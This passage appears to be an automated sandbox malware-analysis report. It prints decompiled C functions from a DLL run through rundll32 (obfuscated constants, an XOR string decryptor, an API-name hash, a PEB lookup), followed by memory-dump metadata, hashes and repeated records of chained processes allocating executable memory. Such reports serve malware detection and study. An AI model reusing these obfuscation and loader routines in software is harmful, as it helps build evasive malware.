				void* _t49;
				signed int _t56;
				short* _t72;
				signed int _t73;
				signed int _t75;
				signed int _t76;
				signed int _t77;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				short* _t93;
				signed int* _t94;
				signed int* _t95;
				signed int* _t96;
				unsigned int _t98;
				void* _t104;
				short _t106;
				void* _t108;
				void* _t109;

				_t96 =  *(_t108 + 0x1c);
				_push(_t96);
				_push( *(_t108 + 0x20));
				_push(__ecx);
				E100056B2(_t49);
				 *(_t108 + 0x1c) = 0x8b96;
				_t94 =  &(_t96[1]);
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffff20a0;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffff41f6;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) << 0xc;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xeee2dc93;
				 *(_t108 + 0x30) = 0x710f;
				 *(_t108 + 0x30) =  *(_t108 + 0x30) | 0x6ece5f34;
				_t75 = 0x49;
				 *(_t108 + 0x34) =  *(_t108 + 0x30) / _t75;
				_t76 = 0x78;
				 *(_t108 + 0x30) =  *(_t108 + 0x34) / _t76;
				 *(_t108 + 0x30) =  *(_t108 + 0x30) ^ 0x00037f97;
				_t77 =  *_t96;
				_t95 =  &(_t94[1]);
				_t56 =  *_t94 ^ _t77;
				 *(_t108 + 0x20) = _t77;
				 *(_t108 + 0x24) = _t56;
				_t98 =  !=  ? (_t56 + 0x00000001 & 0xfffffffc) + 4 : _t56 + 1;
				_t109 = _t108 + 0xc;
				_t72 = E100157E8(_t98 + _t98);
				 *((intOrPtr*)(_t109 + 0x24)) = _t72;
				if(_t72 != 0) {
					_t106 = 0;
					_t93 = _t72;
					_t104 =  >  ? 0 :  &(_t95[_t98 >> 2]) - _t95 + 3 >> 2;
					if(_t104 != 0) {
						_t73 =  *(_t109 + 0x14);
						do {
							_t84 =  *_t95;
							_t95 =  &(_t95[1]);
							_t85 = _t84 ^ _t73;
							 *_t93 = _t85 & 0x000000ff;
							_t93 = _t93 + 8;
							 *((short*)(_t93 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t106 = _t106 + 1;
							 *((short*)(_t93 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t93 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t106 < _t104);
						_t72 =  *((intOrPtr*)(_t109 + 0x24));
					}
					 *((short*)(_t72 +  *(_t109 + 0x18) * 2)) = 0;
				}
				return _t72;
			}

0x1001bf2a
0x1001bf2f
0x1001bf30
0x1001bf35
0x1001bf36
0x1001bf3b
0x1001bf43
0x1001bf46
0x1001bf50
0x1001bf58
0x1001bf5d
0x1001bf65
0x1001bf6d
0x1001bf7b
0x1001bf80
0x1001bf8a
0x1001bf8d
0x1001bf91
0x1001bf99
0x1001bf9d
0x1001bfa0
0x1001bfa2
0x1001bfa6
0x1001bfba
0x1001bfc5
0x1001bfd0
0x1001bfd2
0x1001bfd9
0x1001bfe1
0x1001bfe3
0x1001bff4
0x1001bff9
0x1001bffb
0x1001bfff
0x1001bfff
0x1001c001
0x1001c004
0x1001c009
0x1001c011
0x1001c017
0x1001c01b
0x1001c024
0x1001c025
0x1001c02c
0x1001c030
0x1001c034
0x1001c034
0x1001c03f
0x1001c03f
0x1001c04b

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e2487da670dfdf4340291a23b1239054837bb09989d1aae364528b122fc451e
Instruction ID: 31a9db1899cf95c0ebf8ee9652300adac22cb49fd3d05de2bcc5fa7de42ab8ee
Opcode Fuzzy Hash: 7e2487da670dfdf4340291a23b1239054837bb09989d1aae364528b122fc451e
Instruction Fuzzy Hash: 6C318C76A183119FD314CF29C88596BF7E1FF88610F414A2EF98597280DB74E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1000903F, Relevance: .1, Instructions: 96
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1000903F(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _t136;
				signed int _t137;
				signed int _t138;

				_v56 = _v56 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_v60 = 0x4b89aa;
				_v24 = 0xd383;
				_v24 = _v24 >> 1;
				_v24 = _v24 + 0xffff6796;
				_v24 = _v24 ^ 0xffff9ecb;
				_v40 = 0x275e;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 ^ 0x00004c05;
				_v36 = 0x2d7f;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x00b5d622;
				_v12 = 0x609d;
				_v12 = _v12 * 0x39;
				_t136 = 0x71;
				_v12 = _v12 * 0x6d;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x24a35bb0;
				_v8 = 0x6158;
				_v8 = _v8 ^ 0x69c6b5b2;
				_v8 = _v8 / _t136;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0xbe8af890;
				_v44 = 0xc5d5;
				_v44 = _v44 | 0xbfd7fc3e;
				_v44 = _v44 ^ 0xbfd7cdf6;
				_v28 = 0x68fd;
				_v28 = _v28 >> 0xd;
				_v28 = _v28 + 0xaf9b;
				_v28 = _v28 ^ 0x0000e0c3;
				_v32 = 0xe5f5;
				_v32 = _v32 ^ 0x15b965a8;
				_v32 = _v32 | 0x20bfb64a;
				_v32 = _v32 ^ 0x35bfa224;
				_v20 = 0x2af5;
				_t137 = 0x36;
				_v20 = _v20 / _t137;
				_v20 = _v20 + 0xffff0be2;
				_v20 = _v20 ^ 0xaeef640c;
				_v20 = _v20 ^ 0x5110195f;
				_v48 = 0xf5d2;
				_t138 = 0x45;
				_push(__ecx);
				_v48 = _v48 / _t138;
				_v48 = _v48 ^ 0x00004994;
				_v16 = 0x4a26;
				_v16 = _v16 + 0xffffa2aa;
				_v16 = _v16 >> 7;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0xffff886f;
				_push(_v36);
				 *((intOrPtr*)( *0x100221b8 + 0x2c + __edx * 4)) = E10003708(_v12, _v8, _v44, E1001BF25(_v24, _v40, _v16), _v28);
				return E1001C5F7(_v32, _v20, _v48, _v16, _t117);
			}

0x10009045
0x10009049
0x1000904d
0x10009054
0x1000905b
0x1000905e
0x10009065
0x1000906c
0x10009073
0x10009077
0x1000907e
0x10009085
0x10009089
0x10009090
0x100090a3
0x100090aa
0x100090ad
0x100090b0
0x100090b4
0x100090bb
0x100090c2
0x100090d0
0x100090d3
0x100090d7
0x100090de
0x100090e5
0x100090ec
0x100090f3
0x100090fa
0x100090fe
0x10009105
0x1000910c
0x10009113
0x1000911a
0x10009121
0x10009128
0x10009132
0x10009137
0x1000913c
0x10009143
0x1000914a
0x10009151
0x1000915b
0x1000915e
0x1000915f
0x10009162
0x10009169
0x10009170
0x10009177
0x1000917b
0x1000917f
0x10009186
0x100091ae
0x100091cc

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa57aaca734bfc9d27f03b23d266dafba2ef08ab062a3d772196c9d4fa76611c
Instruction ID: 92030473fc267208a45804a0a9107ff8cc935f9157fe0e4ef1b606325668945c
Opcode Fuzzy Hash: aa57aaca734bfc9d27f03b23d266dafba2ef08ab062a3d772196c9d4fa76611c
Instruction Fuzzy Hash: BE41FEB1D0061DEBDF58CFA5C98A5EEBFB1FB48314F208198D411B62A0D7B91A46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10008CA3, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 15%

			E10008CA3(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v556;
				void* _t89;
				intOrPtr* _t91;
				signed int _t95;
				signed int _t96;
				signed int _t109;

				_v36 = 0;
				_v32 = 0x29d5;
				_v32 = _v32 ^ 0x626c2200;
				_v32 = _v32 ^ 0x626c072c;
				_v16 = 0x8a53;
				_v16 = _v16 ^ 0xc3c6da5f;
				_v16 = _v16 << 2;
				_v16 = _v16 | 0xabb7532b;
				_v16 = _v16 ^ 0xafbf763a;
				_v20 = 0x925b;
				_t95 = 0x78;
				_v20 = _v20 / _t95;
				_t96 = 0x72;
				_v20 = _v20 / _t96;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x0000e1f3;
				_v24 = 0x334;
				_v24 = _v24 + 0x5249;
				_t109 = 0x5c;
				_push(_t96);
				_v24 = _v24 * 0x21;
				_v24 = _v24 ^ 0x000b38a4;
				_v28 = 0x9636;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x00001dee;
				_v12 = 0xb2e5;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x878b803c;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x78b81fbb;
				_v8 = 0xb95e;
				_v8 = _v8 >> 7;
				_v8 = _v8 / _t109;
				_v8 = _v8 * 0x1d;
				_v8 = _v8 ^ 0x00001e7b;
				_t89 = E1001372F( &_v556, _v32, _v16);
				_pop(0);
				if(_t89 != 0) {
					_t91 =  &_v556;
					if(_v556 != 0) {
						while( *_t91 != _t109) {
							_t91 = _t91 + 2;
							if( *_t91 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						 *((short*)(_t91 + 2)) = 0;
					}
					L6:
					_push(0);
					_push(0);
					_push(_v8);
					_push(_v12);
					_push(0);
					_push( &_v556);
					_push( &_v36);
					_push(_v28);
					E1001C50B(_v20, _v24);
				}
				return _v36;
			}

0x10008cb1
0x10008cb4
0x10008cbb
0x10008cc2
0x10008cc9
0x10008cd0
0x10008cd7
0x10008cdb
0x10008ce2
0x10008ce9
0x10008cf6
0x10008cfb
0x10008d03
0x10008d08
0x10008d0d
0x10008d11
0x10008d18
0x10008d1f
0x10008d2a
0x10008d2b
0x10008d32
0x10008d35
0x10008d3c
0x10008d43
0x10008d47
0x10008d4e
0x10008d55
0x10008d59
0x10008d60
0x10008d64
0x10008d6b
0x10008d72
0x10008d7b
0x10008d82
0x10008d85
0x10008d92
0x10008d98
0x10008d9b
0x10008d9d
0x10008daa
0x10008dac
0x10008db1
0x10008db7
0x00000000
0x00000000
0x10008db9
0x00000000
0x10008db7
0x10008dbd
0x10008dbd
0x10008dc1
0x10008dc1
0x10008dc2
0x10008dc3
0x10008dcf
0x10008dd2
0x10008dd3
0x10008dd7
0x10008dd8
0x10008de1
0x10008de6
0x10008df1

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6b1417c14184671c41ad61bda5044eabbd7f3f842d6e1b0d6b422026d02d4ca
Instruction ID: e85a7b7b9e80fa5fa2d4e845e599cd15e0f1cf283e3ac7a04302c228e9e6df58
Opcode Fuzzy Hash: b6b1417c14184671c41ad61bda5044eabbd7f3f842d6e1b0d6b422026d02d4ca
Instruction Fuzzy Hash: 50413471D01219EBEF08CFA1D98A9EEBBB4FB44344F20819AD011A7290E7B45B84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000492A, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 961fd7a361e0172d8f30d972625903cf08f1595dadf935efa2e92da8d0bc0e0d
Instruction ID: b77e1522f9f411a300076352412bb0455ec5798372a08adffc7e0fc2ea0eca11
Opcode Fuzzy Hash: 961fd7a361e0172d8f30d972625903cf08f1595dadf935efa2e92da8d0bc0e0d
Instruction Fuzzy Hash: B9311372D0020DBFDF05CF95CC4A8EEBBB5FB48358F508158F91866260D3B69A659B90

Uniqueness

Uniqueness Score: -1.00%

Function 1001C424, Relevance: .1, Instructions: 67
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1001C424(signed short* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t48;
				signed int _t55;
				signed int _t57;
				signed int _t60;
				signed int _t67;
				signed int _t70;
				signed short* _t72;

				_push(_a4);
				_t72 = __edx;
				_push(__edx);
				E100056B2(_t48);
				_v8 = 0xd4f3;
				_t60 = 0x53;
				_v8 = _v8 / _t60;
				_v8 = _v8 ^ 0x00000290;
				_v4 = 0x6d95;
				_v4 = _v4 >> 5;
				_v4 = _v4 >> 5;
				_v4 = _v4 ^ 0x0000001d;
				_v4 = 0xb2ff;
				_v4 = _v4 * 0x7b;
				_v4 = _v4 ^ 0x00560095;
				if( *((intOrPtr*)(__edx)) != 0) {
					do {
						_t57 = _v8;
						_v4 = 0x6d95;
						_v4 = _v4 >> 5;
						_v4 = _v4 >> 5;
						_v4 = _v4 ^ 0x0000001d;
						_v4 = 0xb2ff;
						_t67 = _v8 << _v4;
						_v4 = _v4 * 0x7b;
						_v4 = _v4 ^ 0x00560095;
						_t55 =  *_t72 & 0x0000ffff;
						_t70 = _v8 << _v4;
						if(_t55 >= 0x41 && _t55 <= 0x5a) {
							_t55 = _t55 + 0x20;
						}
						_v8 = _t55;
						_t72 =  &(_t72[1]);
						_v8 = _v8 + _t67;
						_v8 = _v8 + _t70;
						_v8 = _v8 - _t57;
					} while ( *_t72 != 0);
				}
				return _v8;
			}

0x1001c428
0x1001c42c
0x1001c42e
0x1001c430
0x1001c435
0x1001c44a
0x1001c44d
0x1001c451
0x1001c459
0x1001c461
0x1001c466
0x1001c46b
0x1001c470
0x1001c47d
0x1001c481
0x1001c48c
0x1001c490
0x1001c490
0x1001c494
0x1001c49c
0x1001c4a1
0x1001c4a6
0x1001c4b3
0x1001c4c0
0x1001c4c2
0x1001c4c6
0x1001c4d6
0x1001c4d9
0x1001c4de
0x1001c4e5
0x1001c4e5
0x1001c4e8
0x1001c4ec
0x1001c4ef
0x1001c4f3
0x1001c4f7
0x1001c4fb
0x1001c501
0x1001c50a

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d7db5a319c0fddcc07e6312fb913f27f215fefaf9637745451133b23df0a8b
Instruction ID: 5b25bb63792a61215608fa0d211dbb58c93cd0ca643869af53e15713821623f5
Opcode Fuzzy Hash: e3d7db5a319c0fddcc07e6312fb913f27f215fefaf9637745451133b23df0a8b
Instruction Fuzzy Hash: B521D0B25093469BD314CF22E55941BBBE5FBC47A4F11C82EF0949A250D3B9D9888FA3

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB42, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9956f26a10fc7535e74a3f5d1cd499ec193d0b144d1b9eca5ba6eca8033bceb4
Instruction ID: 5e4aedc5437bb4b730e64eae390bb59a5c3d05a595a5c90b558fa43b463ff24e
Opcode Fuzzy Hash: 9956f26a10fc7535e74a3f5d1cd499ec193d0b144d1b9eca5ba6eca8033bceb4
Instruction Fuzzy Hash: 19212475D01209EBEF14DFE5C94A8DFBFB5EF44314F108189E514A6290D7B55A50CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000D013, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 441580ea7ae88eeb6b8197ed0371b5b80a46c1aa0107404033ae04c8b844b690
Instruction ID: 20914b439a1a855b43ffabf6c900b342f87e07b14d6fa3fc41aad407bb02958c
Opcode Fuzzy Hash: 441580ea7ae88eeb6b8197ed0371b5b80a46c1aa0107404033ae04c8b844b690
Instruction Fuzzy Hash: 34218E71E00208FBEB08DFE5D94A9DEBBB6FB44310F10C099E514AB280D7B65B548F81

Uniqueness

Uniqueness Score: -1.00%

Function 10001D4D, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001D4D() {

				return  *[fs:0x30];
			}

0x10001d53

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2708 Parent PID: 2360 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 00210530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00210575
UnmapViewOfFile.KERNELBASE(?), ref: 00210625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0021063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00210770

Memory Dump Source

Source File: 00000008.00000002.2108863166.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f0000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 12da7ea77053d9a4454a67c47f97abb959356eab343d44c8e8639802e2d4a6cd
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: A5B198B4E00109DFCB48CF94C591AAEB7B5BF98304F208159E919AB345D775EE92CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0020FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0020FFD4

Strings

VirtualAlloc, xrefs: 0020FFB9, 0020FFBC

Memory Dump Source

Source File: 00000008.00000002.2108863166.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f0000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 83315a3cf3cf2dacbed528e6ed80a8dc6b12b11bad318e9238a6ee6467b7b864
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: FA113060D08389DEEB01D7E884097EFBFB55B21704F044098E6446A282D2BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2844 Parent PID: 2708 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 00190530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00190575
UnmapViewOfFile.KERNELBASE(?), ref: 00190625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00190770

Memory Dump Source

Source File: 00000009.00000002.2118717620.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_170000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: aea1f403cb3254309c980acc42e4dccf62f7f7b91da7773a6c9d4baf8a4c9e6a
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: DEB199B5E00109DFCB48CF84C591AAEB7B5BF88314F248159E919AB355D735EE82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0018FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018FFD4

Strings

VirtualAlloc, xrefs: 0018FFB9, 0018FFBC

Memory Dump Source

Source File: 00000009.00000002.2118717620.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_170000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 8a0e2f16d3e2f68090e21e5e7611a51a1228c9cb88d0a34e35e9d00eb20a6ec8
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 8D113060D08289EEEF01D7E8880A7EFBFB55B21704F044098D6446A282D3BA57598BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2804 Parent PID: 2844 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 00280530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00280575
UnmapViewOfFile.KERNELBASE(?), ref: 00280625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0028063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00280770

Memory Dump Source

Source File: 0000000A.00000002.2129687131.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_260000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 7dc460e4b3ef9fc47954468afd45507a806ff585c59b67bd5f4e78e116fffced
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: BCB1AB78E01109DFCB48DF84C590AAEB7B5BF88314F208159E915AB345D735EE96CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0027FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0027FFD4

Strings

VirtualAlloc, xrefs: 0027FFB9, 0027FFBC

Memory Dump Source

Source File: 0000000A.00000002.2129687131.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_260000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: ea5bd197f9c99e9aa82d3a1f5c6e556b4af97fe929e98f64aaee39e308ccd89b
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: AA111260D082CDDEEF01D7E8D4097EFBFB55F11704F044098D6496B282D6BA57588BB6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2936 Parent PID: 2804 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	1

Executed Functions

Function 000E0530, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 000E0575
UnmapViewOfFile.KERNELBASE(?), ref: 000E0625
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 000E063F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 000E0770

Memory Dump Source

Source File: 0000000B.00000002.2144445721.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 1bb43da6506a2dfe039cf2ca7933ac99063f39c27b4aa31b6b43420b0f9c351c
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: A2B1A9B5E00109DFCB48CF85C590AAEB7B5BF88304F248159E915AB341D775EE82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 000DFF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 000DFFD4

Strings

VirtualAlloc, xrefs: 000DFFB9, 000DFFBC

Memory Dump Source

Source File: 0000000B.00000002.2144445721.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c0000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: e6006c5e0f16890f1fceb44262b718fc46e8e7710a1e4d68d4b59e0569aabecc
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
